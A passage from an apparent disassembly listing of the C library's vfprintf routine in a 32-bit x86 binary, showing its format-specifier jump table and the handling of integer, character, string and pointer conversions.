vfprintf+85Fj ; vfprintf+8CDj add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov ecx, [ecx-4] mov [ebp+var_490], ecx jmp loc_8050218 ; case 0x4c ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_805017C: ; CODE XREF: vfprintf+833j mov edx, [ebp+var_400] movzx edx, byte ptr [edx] mov ebx, dword_8078FA0 mov [ebp+var_4E4], ebx test byte ptr [ebx+edx*2+1], 8 jz short loc_805020C add edx, 0FFFFFFD0h mov [ebp+var_4F0], edx inc [ebp+var_400] mov eax, [ebp+var_400] movzx edx, byte ptr [eax] test byte ptr [ebx+edx*2+1], 8 jz short loc_80501FE mov [ebp+var_4E4], ebx db 8Dh,76h,0 ; lea esi, [esi+0] loc_80501C0: ; CODE XREF: vfprintf+974j mov edi, [ebp+var_4F0] lea edx, [edi+edi*8] lea edx, [edx+edi-30h] mov [ebp+var_4E0], edx movzx edx, byte ptr [eax] add edx, [ebp+var_4E0] mov [ebp+var_4F0], edx inc [ebp+var_400] mov eax, [ebp+var_400] movzx edx, byte ptr [eax] mov ecx, [ebp+var_4E4] test byte ptr [ecx+edx*2+1], 8 jnz short loc_80501C0 loc_80501FE: ; CODE XREF: vfprintf+92Dj mov ebx, [ebp+var_4F0] mov [ebp+var_490], ebx jmp short loc_8050218 ; case 0x4c ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805020C: ; CODE XREF: vfprintf+90Ej mov [ebp+var_490], 0 lea esi, [esi] loc_8050218: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... 
mov edx, [ebp+var_400] ; case 0x4c mov dl, [edx] mov [ebp+var_4A0], dl and edx, 0FFh cmp edx, 78h ; switch 121 cases ja loc_8050E7C ; default jmp ds:off_805023C[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 off_805023C dd offset loc_8050E72, 24h dup(offset loc_8050E7C), offset loc_8050464 ; DATA XREF: vfprintf+9ADr dd 1Fh dup(offset loc_8050E7C), offset loc_8050974, offset loc_8050E7C ; jump table for switch statement dd offset loc_8050974, 4 dup(offset loc_8050E7C), offset loc_8050454 dd 0Bh dup(offset loc_8050E7C), offset loc_805058C, offset loc_8050E7C dd offset loc_8050444, 8 dup(offset loc_8050E7C), offset loc_8050A7C dd offset loc_80504A0, 3 dup(offset loc_8050974), offset loc_8050420 dd offset loc_80504A0, 2 dup(offset loc_8050E7C), offset loc_805042C dd offset loc_8050DA0, offset loc_8050D10, offset loc_8050580 dd offset loc_8050CA4, offset loc_8050454, offset loc_8050E7C dd offset loc_8050B34, offset loc_8050E7C, offset loc_8050574 dd 2 dup(offset loc_8050E7C), offset loc_805058C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050420: ; CODE XREF: vfprintf+9ADj ; DATA XREF: vfprintf+9B4o mov [ebp+var_480], 1 ; case 0x68 jmp short loc_8050459 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805042C: ; CODE XREF: vfprintf+9ADj ; DATA XREF: vfprintf+9B4o cmp [ebp+var_484], 0 ; case 0x6c jnz short loc_8050454 ; case 0x4c mov [ebp+var_484], 1 jmp short loc_8050459 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050444: ; CODE XREF: vfprintf+9ADj ; DATA XREF: vfprintf+9B4o xor esi, esi ; case 0x5a mov [ebp+var_484], 0 jmp short loc_8050459 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050454: ; CODE XREF: vfprintf+9ADj ; vfprintf+BABj ; DATA XREF: ... mov esi, 1 ; case 0x4c loc_8050459: ; CODE XREF: vfprintf+BA2j ; vfprintf+BB7j ... 
inc [ebp+var_400] jmp loc_8050218 ; case 0x4c ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050464: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... mov edi, [ebp+arg_0] ; case 0x25 mov edx, [edi+14h] cmp [edi+18h], edx ja short loc_8050488 push 25h push edi call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 jmp short loc_8050494 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050488: ; CODE XREF: vfprintf+BE5j mov ecx, [ebp+arg_0] mov edx, [ecx+14h] mov byte ptr [edx], 25h inc dword ptr [ecx+14h] loc_8050494: ; CODE XREF: vfprintf+BFBj inc [ebp+var_464] jmp loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80504A0: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... mov [ebp+var_4F0], 0Ah ; case 0x64 test esi, esi jz loc_8050538 add [ebp+arg_8], 8 mov ebx, [ebp+arg_8] mov edi, [ebx-8] mov [ebp+var_4EC], edi mov edi, [ebx-4] mov [ebp+var_4E8], edi mov [ebp+var_488], 0 cmp [ebp+var_4E8], 0 jge short loc_80504E4 inc [ebp+var_488] loc_80504E4: ; CODE XREF: vfprintf+C54j mov ecx, [ebp+var_4EC] mov [ebp+var_4EC], ecx mov ecx, [ebp+var_4E8] mov [ebp+var_4E8], ecx cmp [ebp+var_488], 0 jz short loc_8050518 neg [ebp+var_4EC] adc [ebp+var_4E8], 0 neg [ebp+var_4E8] loc_8050518: ; CODE XREF: vfprintf+C7Bj mov ebx, [ebp+var_4EC] mov [ebp+var_49C], ebx mov ebx, [ebp+var_4E8] mov [ebp+var_498], ebx jmp loc_80505D5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050538: ; CODE XREF: vfprintf+C24j cmp [ebp+var_484], 0 jz short loc_8050550 add [ebp+arg_8], 4 mov edi, [ebp+arg_8] mov edx, [edi-4] jmp short loc_805055A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050550: ; CODE XREF: vfprintf+CB7j add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov edx, [ecx-4] loc_805055A: ; CODE XREF: vfprintf+CC3j mov ebx, edx shr ebx, 1Fh mov [ebp+var_488], ebx jz short loc_8050569 neg edx loc_8050569: ; CODE XREF: 
vfprintf+CDDj mov [ebp+var_49C], edx jmp loc_80506C4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050574: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... mov [ebp+var_4F0], 0Ah ; case 0x75 jmp short loc_8050596 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050580: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... mov [ebp+var_4F0], 8 ; case 0x6f jmp short loc_8050596 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805058C: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... mov [ebp+var_4F0], 10h ; case 0x58 loc_8050596: ; CODE XREF: vfprintf+CF6j ; vfprintf+D02j mov [ebp+var_488], 0 mov [ebp+var_478], 0 mov [ebp+var_470], 0 test esi, esi jz loc_8050698 add [ebp+arg_8], 8 mov edi, [ebp+arg_8] mov ecx, [edi-8] mov [ebp+var_49C], ecx mov ecx, [edi-4] mov [ebp+var_498], ecx loc_80505D5: ; CODE XREF: vfprintf+CA8j cmp [ebp+var_490], 0 jl short loc_8050608 mov [ebp+var_494], 20h cmp [ebp+var_490], 0 jnz short loc_8050612 cmp [ebp+var_49C], 0 jnz short loc_8050612 cmp [ebp+var_498], 0 jnz short loc_8050612 lea esi, [ebp+var_1] jmp short loc_8050671 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050608: ; CODE XREF: vfprintf+D54j mov [ebp+var_490], 1 loc_8050612: ; CODE XREF: vfprintf+D64j ; vfprintf+D6Dj ... cmp [ebp+var_4A0], 58h setz dl and edx, 0FFh push edx mov ebx, [ebp+var_4F0] push ebx push ebp push [ebp+var_498] push [ebp+var_49C] call sub_8062714 mov esi, eax dec esi add esp, 14h cmp [ebp+var_47C], 0 jz short loc_8050671 cmp [ebp+var_458], 0 jz short loc_8050671 mov edx, [ebp+var_3F8] push edx mov edi, [ebp+var_458] push edi lea edx, [ebp+var_1] push edx push esi call sub_8052C9C mov esi, eax add esp, 10h loc_8050671: ; CODE XREF: vfprintf+D7Bj ; vfprintf+DC1j ... 
xor edx, edx cmp [ebp+var_49C], 0 jnz short loc_8050685 cmp [ebp+var_498], 0 jz short loc_805068A loc_8050685: ; CODE XREF: vfprintf+DF2j mov edx, 1 loc_805068A: ; CODE XREF: vfprintf+DFBj mov [ebp+var_49C], edx jmp loc_80507DC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050698: ; CODE XREF: vfprintf+D2Ej cmp [ebp+var_484], 0 jz short loc_80506B4 add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov ecx, [ecx-4] mov [ebp+var_49C], ecx jmp short loc_80506C4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80506B4: ; CODE XREF: vfprintf+E17j add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] mov ebx, [ebx-4] mov [ebp+var_49C], ebx loc_80506C4: ; CODE XREF: vfprintf+CE7j ; vfprintf+E29j ... cmp [ebp+var_490], 0 jl short loc_80506F0 mov [ebp+var_494], 20h cmp [ebp+var_490], 0 jnz short loc_80506FA cmp [ebp+var_49C], 0 jnz short loc_80506FA lea esi, [ebp+var_1] jmp loc_80507DC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80506F0: ; CODE XREF: vfprintf+E43j mov [ebp+var_490], 1 loc_80506FA: ; CODE XREF: vfprintf+E53j ; vfprintf+E5Cj mov edx, [ebp+var_49C] mov eax, edx mov edx, ebp mov [ebp+var_4EC], offset a0123456789abcd ; "0123456789abcdefghijklmnopqrstuvwxyz" cmp [ebp+var_4A0], 58h jnz short loc_8050721 mov [ebp+var_4EC], offset a0123456789ab_0 ; "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" loc_8050721: ; CODE XREF: vfprintf+E8Dj mov esi, edx cmp [ebp+var_4F0], 0Ah jz short loc_8050748 ja short loc_805073C cmp [ebp+var_4F0], 8 jz short loc_805077C jmp short loc_8050794 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805073C: ; CODE XREF: vfprintf+EA4j cmp [ebp+var_4F0], 10h jz short loc_8050764 jmp short loc_8050794 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050748: ; CODE XREF: vfprintf+EA2j ; vfprintf+ED7j dec esi mov edi, 0Ah xor edx, edx div edi mov ecx, [ebp+var_4EC] mov dl, [edx+ecx] mov [esi], dl test eax, eax jnz short 
loc_8050748 jmp short loc_80507AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050764: ; CODE XREF: vfprintf+EBBj ; vfprintf+EF0j dec esi mov edx, eax and edx, 0Fh mov ebx, [ebp+var_4EC] mov dl, [edx+ebx] mov [esi], dl shr eax, 4 jnz short loc_8050764 jmp short loc_80507AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805077C: ; CODE XREF: vfprintf+EADj ; vfprintf+F08j dec esi mov edx, eax and edx, 7 mov edi, [ebp+var_4EC] mov dl, [edx+edi] mov [esi], dl shr eax, 3 jnz short loc_805077C jmp short loc_80507AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050794: ; CODE XREF: vfprintf+EAFj ; vfprintf+EBDj ... dec esi xor edx, edx div [ebp+var_4F0] mov ecx, [ebp+var_4EC] mov dl, [edx+ecx] mov [esi], dl test eax, eax jnz short loc_8050794 loc_80507AC: ; CODE XREF: vfprintf+ED9j ; vfprintf+EF2j ... dec esi cmp [ebp+var_47C], 0 jz short loc_80507DC cmp [ebp+var_458], 0 jz short loc_80507DC mov edx, [ebp+var_3F8] push edx mov ebx, [ebp+var_458] push ebx lea edx, [ebp+var_1] push edx push esi call sub_8052C9C mov esi, eax add esp, 10h loc_80507DC: ; CODE XREF: vfprintf+E08j ; vfprintf+E61j ... mov edx, esi not edx add edx, ebp sub [ebp+var_48C], edx sub [ebp+var_490], edx cmp [ebp+var_49C], 0 jz short loc_805081C cmp [ebp+var_46C], 0 jz short loc_805081C cmp [ebp+var_4F0], 8 jnz short loc_805081C cmp [ebp+var_490], 0 jg short loc_8050825 mov byte ptr [esi], 30h dec esi dec [ebp+var_48C] loc_805081C: ; CODE XREF: vfprintf+F6Dj ; vfprintf+F76j ... 
cmp [ebp+var_490], 0 jle short loc_8050858 loc_8050825: ; CODE XREF: vfprintf+F88j mov edi, [ebp+var_490] sub [ebp+var_48C], edi mov edx, [ebp+var_490] dec edi mov [ebp+var_490], edi test edx, edx jle short loc_8050858 lea esi, [esi] loc_8050844: ; CODE XREF: vfprintf+FCEj mov byte ptr [esi], 30h dec esi mov edx, [ebp+var_490] dec [ebp+var_490] test edx, edx jg short loc_8050844 loc_8050858: ; CODE XREF: vfprintf+F9Bj ; vfprintf+FB8j cmp [ebp+var_49C], 0 jz short loc_805087A cmp [ebp+var_46C], 0 jz short loc_805087A cmp [ebp+var_4F0], 10h jnz short loc_805087A add [ebp+var_48C], 0FFFFFFFEh loc_805087A: ; CODE XREF: vfprintf+FD7j ; vfprintf+FE0j ... cmp [ebp+var_488], 0 jnz short loc_8050895 cmp [ebp+var_478], 0 jnz short loc_8050895 cmp [ebp+var_470], 0 jz short loc_805089B loc_8050895: ; CODE XREF: vfprintf+FF9j ; vfprintf+1002j dec [ebp+var_48C] loc_805089B: ; CODE XREF: vfprintf+100Bj cmp [ebp+var_474], 0 jnz short loc_80508C4 cmp [ebp+var_494], 30h jnz short loc_80508C4 jmp short loc_80508B4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80508B0: ; CODE XREF: vfprintf+103Aj mov byte ptr [esi], 30h dec esi loc_80508B4: ; CODE XREF: vfprintf+1025j mov edx, [ebp+var_48C] dec [ebp+var_48C] test edx, edx jg short loc_80508B0 loc_80508C4: ; CODE XREF: vfprintf+101Aj ; vfprintf+1023j cmp [ebp+var_49C], 0 jz short loc_80508EC cmp [ebp+var_46C], 0 jz short loc_80508EC cmp [ebp+var_4F0], 10h jnz short loc_80508EC mov cl, [ebp+var_4A0] mov [esi], cl dec esi mov byte ptr [esi], 30h dec esi loc_80508EC: ; CODE XREF: vfprintf+1043j ; vfprintf+104Cj ... 
cmp [ebp+var_488], 0 jz short loc_80508FC mov byte ptr [esi], 2Dh jmp short loc_8050918 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80508FC: ; CODE XREF: vfprintf+106Bj cmp [ebp+var_478], 0 jz short loc_805090C mov byte ptr [esi], 2Bh jmp short loc_8050918 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805090C: ; CODE XREF: vfprintf+107Bj cmp [ebp+var_470], 0 jz short loc_8050919 mov byte ptr [esi], 20h loc_8050918: ; CODE XREF: vfprintf+1070j ; vfprintf+1080j dec esi loc_8050919: ; CODE XREF: vfprintf+108Bj cmp [ebp+var_474], 0 jnz short loc_8050944 cmp [ebp+var_494], 20h jnz short loc_8050944 jmp short loc_8050934 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050930: ; CODE XREF: vfprintf+10BAj mov byte ptr [esi], 20h dec esi loc_8050934: ; CODE XREF: vfprintf+10A3j mov edx, [ebp+var_48C] dec [ebp+var_48C] test edx, edx jg short loc_8050930 loc_8050944: ; CODE XREF: vfprintf+1098j ; vfprintf+10A1j mov ebx, [ebp+arg_0] mov ebx, [ebx+50h] mov edi, esi not edi add edi, ebp push edi lea edx, [esi+1] push edx mov ecx, [ebp+arg_0] push ecx mov edx, [ebx+34h] call edx add esp, 0Ch cmp eax, edi jnz loc_8050E72 ; case 0x0 add [ebp+var_464], eax jmp loc_8050B07 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050974: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... 
mov ecx, [ebp+var_490] ; case 0x45 mov [ebp+var_434], ecx mov ebx, [ebp+var_48C] mov [ebp+var_430], ebx mov cl, [ebp+var_4A0] mov [ebp+var_42C], cl mov [ebp+var_428], esi mov ebx, [ebp+var_480] mov [ebp+var_424], ebx mov edi, [ebp+var_484] mov [ebp+var_420], edi mov ecx, [ebp+var_46C] mov [ebp+var_41C], ecx mov ebx, [ebp+var_470] mov [ebp+var_418], ebx mov edi, [ebp+var_474] mov [ebp+var_414], edi mov ecx, [ebp+var_478] mov [ebp+var_410], ecx mov ebx, [ebp+var_47C] mov [ebp+var_40C], ebx mov cl, [ebp+var_494] mov [ebp+var_408], cl mov eax, offset sub_8053310 test esi, esi jz short loc_8050A2C add [ebp+arg_8], 0Ch mov ebx, [ebp+arg_8] mov edx, [ebx-0Ch] mov [ebp+var_3F4], edx mov edx, [ebx-8] mov [ebp+var_3F0], edx mov edx, [ebx-4] mov [ebp+var_3EC], edx jmp short loc_8050A45 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050A2C: ; CODE XREF: vfprintf+117Dj add [ebp+arg_8], 8 mov edi, [ebp+arg_8] mov edx, [edi-8] mov [ebp+var_3F4], edx mov edx, [edi-4] mov [ebp+var_3F0], edx loc_8050A45: ; CODE XREF: vfprintf+11A1j lea ecx, [ebp+var_3F4] mov [ebp+var_438], ecx lea edx, [ebp+var_438] push edx lea edx, [ebp+var_434] push edx mov ebx, [ebp+arg_0] push ebx call eax add esp, 0Ch test eax, eax jl loc_8050E72 ; case 0x0 add [ebp+var_464], eax jmp loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050A7C: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... 
dec [ebp+var_48C] ; case 0x63 cmp [ebp+var_474], 0 jnz short loc_8050AAF cmp [ebp+var_48C], 0 jle short loc_8050AAF mov edi, [ebp+var_48C] push edi push 20h mov ecx, [ebp+arg_0] push ecx call sub_8062534 add [ebp+var_464], eax add esp, 0Ch loc_8050AAF: ; CODE XREF: vfprintf+1201j ; vfprintf+120Aj add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] movzx eax, byte ptr [ebx-4] mov edi, [ebp+arg_0] mov edx, [edi+14h] cmp [edi+18h], edx ja short loc_8050AE0 movzx edx, al push edx push edi call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 jmp short loc_8050B01 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050AE0: ; CODE XREF: vfprintf+123Bj mov ecx, [ebp+arg_0] mov edx, [ecx+14h] mov byte ptr [ebp+var_4D8], al mov [edx], al movzx edx, byte ptr [ebp+var_4D8] inc dword ptr [ecx+14h] cmp edx, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 loc_8050B01: ; CODE XREF: vfprintf+1253j inc [ebp+var_464] loc_8050B07: ; CODE XREF: vfprintf+10E7j cmp [ebp+var_474], 0 jz loc_8050DC4 cmp [ebp+var_48C], 0 jle loc_8050DC4 mov ebx, [ebp+var_48C] push ebx push 20h mov edi, [ebp+arg_0] push edi jmp loc_8050C8F ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050B34: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... add [ebp+arg_8], 4 ; case 0x73 mov ecx, [ebp+arg_8] mov esi, [ecx-4] loc_8050B3E: ; CODE XREF: vfprintf+1470j ; vfprintf+1480j ... 
test esi, esi jnz short loc_8050B7C cmp [ebp+var_490], 0FFFFFFFFh jz short loc_8050B54 cmp [ebp+var_490], 5 jle short loc_8050B68 loc_8050B54: ; CODE XREF: vfprintf+12C1j mov esi, offset aNull ; "(null)" mov [ebp+var_4F0], 6 jmp loc_8050C00 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050B68: ; CODE XREF: vfprintf+12CAj mov esi, offset unk_8067EEB mov [ebp+var_4F0], 0 jmp loc_8050C00 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050B7C: ; CODE XREF: vfprintf+12B8j cmp [ebp+var_490], 0FFFFFFFFh jnz short loc_8050BDC xor al, al mov edi, esi cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx dec edx mov [ebp+var_4F0], edx cmp [ebp+var_48C], 0 jnz short loc_8050C00 mov edi, [ebp+arg_0] mov edx, [edi+50h] mov ecx, [ebp+var_4F0] push ecx push esi push edi mov edx, [edx+34h] call edx add esp, 0Ch cmp [ebp+var_4F0], eax jnz loc_8050E72 ; case 0x0 mov ebx, [ebp+var_4F0] add [ebp+var_464], ebx jmp loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050BDC: ; CODE XREF: vfprintf+12FBj mov ebx, [ebp+var_490] push ebx push 0 push esi call sub_80575C0 add esp, 0Ch mov [ebp+var_4F0], ebx test eax, eax jz short loc_8050C00 sub eax, esi mov [ebp+var_4F0], eax loc_8050C00: ; CODE XREF: vfprintf+12DBj ; vfprintf+12EFj ... 
mov edi, [ebp+var_4F0] sub [ebp+var_48C], edi cmp [ebp+var_474], 0 jnz short loc_8050C39 cmp [ebp+var_48C], 0 jle short loc_8050C39 mov ecx, [ebp+var_48C] push ecx push 20h mov ebx, [ebp+arg_0] push ebx call sub_8062534 add [ebp+var_464], eax add esp, 0Ch loc_8050C39: ; CODE XREF: vfprintf+138Bj ; vfprintf+1394j mov edi, [ebp+arg_0] mov edx, [edi+50h] mov ecx, [ebp+var_4F0] push ecx push esi push edi mov edx, [edx+34h] call edx add esp, 0Ch cmp [ebp+var_4F0], eax jnz loc_8050E72 ; case 0x0 mov ebx, [ebp+var_4F0] add [ebp+var_464], ebx cmp [ebp+var_474], 0 jz loc_8050DC4 cmp [ebp+var_48C], 0 jle loc_8050DC4 mov edi, [ebp+var_48C] push edi push 20h mov ecx, [ebp+arg_0] push ecx loc_8050C8F: ; CODE XREF: vfprintf+12A6j call sub_8062534 add [ebp+var_464], eax add esp, 0Ch jmp loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050CA4: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... add [ebp+arg_8], 4 ; case 0x70 mov ebx, [ebp+arg_8] mov edx, [ebx-4] test edx, edx jz short loc_8050CEC mov [ebp+var_4F0], 10h mov [ebp+var_49C], edx mov [ebp+var_488], 0 mov [ebp+var_46C], 1 mov [ebp+var_47C], 0 mov [ebp+var_4A0], 78h jmp loc_80506C4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050CEC: ; CODE XREF: vfprintf+1428j mov esi, offset aNil_0 ; "(nil)" cmp [ebp+var_490], 4 jg loc_8050B3E mov [ebp+var_490], 5 jmp loc_8050B3E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050D10: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... 
